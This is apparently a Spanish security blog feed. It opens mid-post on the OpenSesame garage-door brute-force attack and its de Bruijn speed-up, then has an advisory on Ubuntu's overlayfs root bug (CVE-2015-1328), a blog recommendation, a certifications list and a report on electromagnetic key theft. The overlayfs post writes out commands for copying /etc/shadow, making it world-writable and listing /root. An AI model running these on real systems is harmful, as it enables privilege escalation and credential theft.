
1771.52s / 5 = 354.304 seconds = ~6 minutes

Simple: así dividimos el tiempo en 5.

La siguiente vuelta de tuerca está también clara. ¿Y si eliminamos el tiempo de espera entre envíos y mandamos cada código back-to-back?. Efectivamente, funciona y reduce el tiempo en transmitir todos los códigos en un 50%! Increíble.

1771.52s / 5 / 2 = 177.152 seconds = ~3 minutes

Pero todavía podemos ir más allá. Aquí es donde hablaríamos del ataque OpenSesame propiamente dicho. 


Por ejemplo un código de 3 bits se enviaría inicialmente así:

000---001---010---011---101---111---110---100 (48 bits)

Si quitamos los tiempos de espera se reduciría a la mitad, tal y como comentábamos antes:

000001010011101111110100 (24 bits)

Ahora solapamos (de Bruijn) y reducimos casi otro 62%:

000 011
 001 111
  010 110
   101 100
0001011100 (10 bits)

Y aquí viene lo bueno. Al mirar los datos que estamos enviando, vemos que se trata de un flujo continuo de bits. Por ejemplo:

     (Código # 1) 000 000 000 000
     (Código # 2) 000 000 000 001
     (Código # 3) 000 000 000 010
     (Código # 4) 000 000 000 011 y así sucesivamente, lo que es:
   
000000000000000000000001000000000010000000000011

¿Cómo ve el receptor este flujo de bits? Si está utilizando un registro de desplazamiento de bits el garaje se abrirá en cuanto detecte el código correspondiente, ignorando cualquier cantidad de bits antes o después.

Imaginemos que el pin del garaje es 111111000000. Si el receptor utiliza un registro de desplazamiento y le envían 13 bits, "0111111000000", primero nos devolverá pin incorrecto: 011 111 100 000. Pero después seguirá "desplazando" a la izquierda el flujo de bits y enviará  111 111 000 000 ¡correcto!.

Esto significa que con 13 bits hemos probado dos códigos de 12 bits en lugar de enviar un total de 24 bits. ¡Increíble!

Lo más "bonito" es que el garaje no está reseteando por completo cada código intentado, un código de 12 bits también pone a prueba cinco códigos de 8 bits, cuatro códigos de 9 bits, tres 10 códigos de bits, cuatro 11 códigos de bits y, por supuesto, un código de 12 bits! El tiempo les enviamos cada código de 12 bits, todos los códigos de 8-11 bits serán probados simultáneamente.

Ahora, debe haber un algoritmo para producir de manera eficiente cada código posible, con solapamiento (para explotar el registro de desplazamiento) en tan pocos bits como sea posible.
La respuesta la tenía Nicolaas Govert de Bruijn, un matemático holandés que descubrió la llamada secuencia de Bruijn. OpenSesame implementa este algoritmo para producir cada posible secuencia de solapamiento de 8-12 bits en la menor cantidad de tiempo. ¿Qué cantidad de tiempo?

Para probar todas las posibilidades de 8 a 12 bits: ((2 ** 12) + 11) * 4 ms / 2 = 8214ms = 8,214 segundos

Hemos conseguido bajar de 1771 segundos a 8. Incluso la implementación más eficiente con las otras reducciones sin De Bruijn fue en 177 segundos, más de 20 veces más. ¡Impresionante!

A día de hoy los siguientes fabricantes venden productos vulnerables a este ataque:

Y los siguientes fabricantes tienen modelos viejos vulnerables pero los modelos que venden ahora ya no son susceptibles a estos ataques (o no se siguen vendiendo):
  • Chamberlain
  • Liftmaster
  • Stanley
  • Delta-3
  • Moore-O-Matic
Si estas utilizando un garaje o una puerta que utiliza "códigos fijos" para prevenir este tipo de ataques asegúrate de actualizarte a un sistema con códigos de salto, también llamados "rolling codes", "Intellicode", "Security+", etc. Son mucho más seguros aunque, eso sí, susceptibles a otros ataques.

El código puedes encontrarlo en https://github.com/samyk/opensesame aunque está "brickeado" para que no sea 100% operativo porque su propósito es educativo. Aunque, si eres un experto en RF y microcontroladores podrás corregirlo para que sea funcional...


Fuente: http://samy.pl/opensesame/

Ganadores de los Premios a los mejores bloggers de seguridad de la UE en 2015

$
0
0
Hace un par de días, en la vigésima edición de la conferencia Infosecurity Europe, se anunciaron los ganadores de los premios a los mejores bloggers de seguridad de Europa en 2015, en la que estuvieron también nominados como finalistas nuestros compañeros de SbD. Este año tampoco hubo suerte (pues todos sabemos lo difícil que es que gane en la UE un blog escrito en la lengua de Cervantes), pero siempre está bien conocer quien se llevó finalmente el gato al agua:

The Best Corporate Security BlogThe Best European Corporate Security Blog The Best Euro PodcastThe Best Security PodcastThe Best Security Video BlogThe Best Personal Security BlogThe Best European Personal Security BlogThe Most Entertaining BlogThe Most Educational BlogThe Best New Security Blog
The Best EU Security TweeterThe Grand Prix Prize for the Best Overall Security BlogFuente: EU Security Blogger Award Winners

Vulnerabilidad en overlayfs permite escalar privilegios en todas las versiones de Ubuntu

$
0
0
La vulnerabilidad CVE-2015-1328 permite escalar privilegios como root localmente en la configuración por defecto en todas las versiones soportadas de Ubuntu.
 
El sistema de ficheros overlayfsno comprueba correctamente los permisos cuando se crean nuevos archivos en un directorio superior, concretamente las funciones de ovl_copy_up_*. Los únicos permisos que se comprueban son si el propietario del archivo que se está modificando tiene permiso para escribir en el directorio superior. Por otra parte, cuando un archivo se copia desde el directorio inferior los metadatos del archivo se copian literalmente, en lugar de los atributos como el owner que se cambia por el usuario que ha ejecutado los procedimientos de copy_up_*.

Veamos un ejemplo de una copia 1:1 de un fichero del root:

(ten en cuenta que la opción workdir= no es necesaria en los viejos kernels)

user () ubuntu-server-1504:~$ ./create-namespace
root () ubuntu-server-1504:~# mount -t overlay -o
lowerdir=/etc,upperdir=upper,workdir=work overlayfs o
root () ubuntu-server-1504:~# chmod 777 work/work/
root () ubuntu-server-1504:~# cd o
root () ubuntu-server-1504:~/o# mv shadow copy_of_shadow
(exit the namespace)
user () ubuntu-server-1504:~$ ls -al upper/copy_of_shadow
-rw-r----- 1 root shadow 1236 May 24 15:51 upper/copy_of_shadow
user () ubuntu-server-1504:~$ stat upper/copy_of_shadow /etc/shadow|grep Inode
Device: 801h/2049d      Inode: 939791      Links: 1
Device: 801h/2049d      Inode: 277668      Links: 1


Ahora podemos colocar este archivo en /etc cambiando "upper" por la opción lowerdir, los permisos son validados porque el fichero pertenece a root y root puede escribir en /etc.

user () ubuntu-server-1504:~$ ./create-namespace
root () ubuntu-server-1504:~# mount -t overlay -o
lowerdir=upper,upperdir=/etc,workdir=work overlayfs o
root () ubuntu-server-1504:~# chmod 777 work/work/
root () ubuntu-server-1504:~# cd o
root () ubuntu-server-1504:~/o# chmod 777 copy_of_shadow
root () ubuntu-server-1504:~/o# exit
user () ubuntu-server-1504:~$ ls -al /etc/copy_of_shadow
-rwxrwxrwx 1 root shadow 1236 May 24 15:51 /etc/copy_of_shadow

 

El exploit adjunto lanza un shell como root creando un fichero /etc/ld.so.preload escribible por todo el mundo.

También es posible listar el contenido del directorio en cualquier directorio del sistema independientemente de los permisos:

nobody () ubuntu-server-1504:~$ ls -al /root
ls: cannot open directory /root: Permission denied
nobody () ubuntu-server-1504:~$ mkdir o upper work
nobody () ubuntu-server-1504:~$ mount -t overlayfs -o
lowerdir=/root,upperdir=/home/user/upper,workdir=/home/user/work
overlayfs /home/user/o
nobody () ubuntu-server-1504:~$ ls -al o 2>/dev/null
total 8
drwxrwxr-x 1 root nogroup 4096 May 24 16:33 .
drwxr-xr-x 8 root nogroup 4096 May 24 16:33 ..
-????????? ? ?    ?          ?            ? .bash_history
-????????? ? ?    ?          ?            ? .bashrc
d????????? ? ?    ?          ?            ? .cache
-????????? ? ?    ?          ?            ? .lesshst
d????????? ? ?    ?          ?            ? linux-3.19.0


Esto puede ser explotado por un proceso sin privilegios en kernels con "CONFIG_USER_NS = y" y donde overlayfs tiene el flag FS_USERNS_MOUNT, que permite montar overlayfs dentro de namespaces sin privilegios. Esta es la configuración por defecto de Ubuntu 12.04, 14.04, 14.10, y 15.04 y se ha probado
en los kernels más recientes anteriores a 2015-06-15 de estas versiones.
 
Si no quieres actualizar tu kernel y no utilizas overlayfs, un workaround recomendable es eliminar simplemente overlayfs.ko / overlay.ko.


Fuente:CVE-2015-1328: incorrect permission checks in overlayfs, ubuntu local root

Recomendaciones: JsiTech

$
0
0
JsiTech es un blog que inicialmente nació dedicándose a Linux y al software libre pero desde hace un tiempo su autor, Jason Soto, viene desarrollando el tema de la seguridad y el hacking y hoy día es el tema principal de este magnífico blog.



Podemos decir por tanto que JsiTech es un blog dedicado a la seguridad informática, ethical hacking y de vez en cuando algo de Linux. La idea principal es hablar de temas generales de seguridad, además de dar a conocer herramientas y técnicas de hacking.

Con JsiTech, Jason pretende compartir el conocimiento y que sea de provecho para toda la comunidad, además de mantenernos informados sobre las nuevas vulnerabilidades y ataques que día a día salen a la luz.

Visítenlo y nos seguimos leyendo

Sitio: www.jsitech.com


Y si tú también tienes un sitio que quieres que conozcamos o deseas publicar aquí tu post no lo dudes yparticipa :)

Las 10 certificaciones de IT más prometedoras para el 2015

$
0
0
Con cada vez mayor competencia en el mercado de trabajo, las certificaciones se han vuelto más y mas importantes. Está claro que las certificaciones tienen un gran valor para cualquier empresa y un título específico aumenta las posibilidades de conseguir un mejor puesto de trabajo en empresas de TI. El grupo de Azure de EFY ha compilado una la lista de las 10 certificaciones de TI que promete mejores opciones de trabajo para este año:

1. Project Management Professional (PMP)


Esta es la certificación más importante y reconocida para los directores de proyectos. PMP es conocida por la experiencia, la educación y las competencias para liderar y dirigir proyectos. La demanda de esta certificación se ha incrementado en el mercado y asegura un sueldo elevado a los gerentes de proyectos.

2. Certified Information Systems Security Professional (CISSP)


CISSP es un estándar reconocido a nivel mundial por sus logros en el conocimiento del individuo en el campo de la seguridad de la información. Las empresas prefieren a un candidato con la certificación CISSP, ya que asegura profundo conocimiento y las habilidades de la arquitectura, el diseño, la gestión y los controles de seguridad del entorno empresarial. Los exámenes CISSP cubren todos los temas necesarios y críticos como la gestión de riesgos, el cloud computing, seguridad móvil, la seguridad de desarrollo de aplicaciones, etc.

3. Microsoft Certified Solutions Developer (MCSD)

Esta certificación debes tenerla si eres es un desarrollador con experiencia en el análisis y diseño de software de solución empresarial con lenguajes y herramientas de desarrollo de Microsoft. Un candidato con MCSD es miembro de Microsoft Certified Professionals y los MCPs tienen un gran valor en el mercado de trabajo.


4. Microsoft Certified Database Administrator (MCDBA)

Microsoft Database Administrator Certified prueba la capacidad del candidato para diseñar, implementar y administrar bases de dato SQL Server 2000. Esta certificación fue eliminada en septiembre de 2012, sin embargo, todavía tiene un gran valor. Si estás planeando obtener una certificación en SQL, puedes optar a Microsoft Certified Solutions Expert (MCSE) for Data Platform para profesionales de bases de datos o Microsoft Certified Solutions Expert (MCSE) para Business Intelligence.

5. Cisco Certified Design Associate (CCDA)
 

Esta es una certificación reconocida para los ingenieros de diseño de la red, los técnicos y los ingenieros de soporte que puedan asegurar la eficiencia del entorno de red con el conocimiento profundo de los fundamentos de diseño de red. CCDA para profesionales de comunicaciones demuestra las habilidades para diseñar el campus básico, centro de datos, seguridad, voz y red inalámbrica.

6. Microsoft Certified Application Developer (MCAD)

Esta certificación asegura la capacidad de construir potentes aplicaciones que utilizan servicios Web .NET y Visual Studio de Microsoft. MCAD permite a los desarrolladores mostrar sus habilidades para implementar aplicaciones funcionales, implementarlas y mantenerlas. Conseguir el MCDA es duro pero añade mucho valor a tu currículum.


7. VMware Certified Professional (VCP)

VMware Certified Professional garantiza trabajo en el entorno del CDP. Esta certificación requiere la realización de un curso autorizado de VMWare y experiencia práctica con las tecnologías de VMware. Esta certificación es esencial para diferenciarse en el mercado de trabajo para validar las habilidades técnicas. La certificación VCP-DCV confirma la capacidad del candidato parainstalar, desplegar y gestionar un entorno VMware vSphere.

8. Certificado Novell Engineer (CNE)

Esta certificación valida el conocimiento de habilidades de soporte de red. Con esta certificación se puede obtener fácilmente un trabajo de administrador de red. Los empleadores tienen la seguridad de que el candidato con el CNE puede mantener la red de la empresa funcionando de manera eficiente. Un CNE realiza la planificación, instalación, configuración, solución de problemas y la mejora de los servicios de redes.

9. Fundamentos de ITIL v3

Se trata de una titulación de nivel de iniciación que garantiza el conocimiento de los elementos clave, conceptos y terminología utilizados en el ciclo de vida del servicio de ITIL. La conclusión con éxito de la certificación ITIL mejora la visión general y conocimientos básicos de ITIL en los candidatos. Este curso también cumple los criterios de nivel de entrada para el próximo estudio de nivel en el esquema de calificación de ITIL.

10. Database Administrator 2008 (MCITP)

Esta certificación demuestra que se tienen las habilidades necesarias para realizar un determinado puesto de trabajo de TI como administrador de base de datos o administrador de mensajería empresarial. Sin embargo, este curso de certificación se basa en las versiones anteriores de las tecnologías de Microsoft. Pero puede ser una base fundamental para las Microsoft Certified Solutions Expert (MCSE).

Roban las claves de descifrado de un PC mediante la medición de emanaciones electromagnéticas

$
0
0
Si recordáis hace tiempo ya vimos que es posible obtener claves de cifrado RSA de 4096 bits escuchando el sonido de emite la CPU. Ahora investigadores de la Universidad de Tel Aviv han dado una vuelta más de tuerca y son capaces de obtener las claves de cifrado de GnuPG en segundos midiendo las emanaciones electromagnéticas que se generan durante el proceso de descifrado. Y algo tambie increible, no es necesario disponer de un caro laboratorio para hacerlo: los investigadores usaron un FUNcube Dongle Pro + (174,5€), conectados a un pequeño Rikomagic MK802 IV con Android (unos 80€), para medir las emisiones en 1,6 y 1,75 MHz. Incluso puede ser posible lanzar el ataque con una radio AM estándar con la salida de audio grabado por un smartphone.


En un extracto del paper "Stealing Keys from PCs using a Radio: Cheap Electromagnetic Attacks on Windowed Exponentiation" explican:


"Demostramos la extracción de claves secretas de descifrado de ordenadores portátiles, mediante la medición no intrusiva de emanaciones electromagnéticas durante unos segundos y a una distancia de 50 cm. El ataque puede ser ejecutado utilizando equipamiento barato y fácil de obtener: un receptor de radio de tipo consumidor o un dongle USB de radio. La configuración es compacta y puede operar independientemente; se puede ocultar fácilmente, por ejemplo, dentro de pan de pita. Los ordenadores portátiles normales, e implementaciones populares de cifrados RSA y ElGamal, son vulnerables a este ataque, incluyendo aquellos que implementan el descifrado utilizando algoritmos exponenciales modernos de ventana deslizante, o incluso su variante resistente a canal lateral, con exponenciación ventana fija (m-ary).

Se extrajeron con éxito las claves de varios modelos de ordenadores portátiles ejecutando GnuPG (software de cifrado de código abierto, implementación del estándar OpenPGP), en pocos segundos. El ataque envía unos textos cifrados cuidadosamente elaborados, y cuando estos se descifran por el equipo de destino, se desencadena la aparición de valores estructurados especiales dentro del software de descifrado. Estos valores especiales causan fluctuaciones observables en el campo electromagnético que rodean el ordenador portátil, de una manera que depende del patrón de bits de la clave (específicamente, la ventana de clave-bits en la rutina de exponenciación). La clave secreta se puede deducir de estas fluctuaciones, a través del procesamiento de señales y el criptoanálisis".

 
En principio el ataque demostrado por el equipo de Tel Aviv puede ser poco fiable en la práctica, porque los PCs generalmente realizan múltiples tareas al mismo tiempo y no sólo exclusivamente descifran datos. Eso significa que un montón de ruido se añade al proceso, arruinando lo intentos de extraer las claves privadas de las máquinas.

No obstante, habrá que estar atentos al Taller sobre Hardware Criptográfico y Sistemas Embebidos (CHES) en Francia en septiembre de 2015, donde los investigadores israelíes tienen la intención de presentar su trabajo...

Fuente: Stealing secret crypto-keys from PCs using leaked radio emissions
Viewing all 1664 articles
Browse latest View live